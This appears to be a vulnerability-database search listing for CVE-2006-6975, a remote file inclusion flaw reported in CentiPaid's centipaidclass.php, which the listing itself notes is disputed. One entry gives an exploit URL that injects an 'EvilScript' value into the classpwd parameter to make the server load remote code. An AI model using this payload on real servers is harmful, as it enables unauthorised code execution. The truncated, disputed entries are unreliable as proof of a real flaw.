3 matches found
CVE-2006-6975
PHP remote file inclusion vulnerability in centipaidclass.php in CentiPaid 1.4.3 allows remote attackers to execute arbitrary code via a URL in the classpwd parameter. NOTE: this issue has been disputed by CVE and multiple third parties, who state that $classpwd is set to a static value before th...
CVE-2006-6975
PHP remote file inclusion vulnerability in centipaidclass.php in CentiPaid 1.4.3 allows remote attackers to execute arbitrary code via a URL in the classpwd parameter. NOTE: this issue has been disputed by CVE and multiple third parties, who state that $classpwd is set to a static value before th...
CentiPaid <= 1.4.2 [$class_pwd] Remote File Include
Affected software description : Application : CentiPaid version : 1.4.3 URL : http://www.centipaid.com/centi/download/centipaidphp-1.4.3.tar.gz Code:centipaidclass.php include$classpwd.'/adodb/adodb.inc.php' Exploit: http://www.site.com/path/centipaidclass.php?classpwd=EvilScript...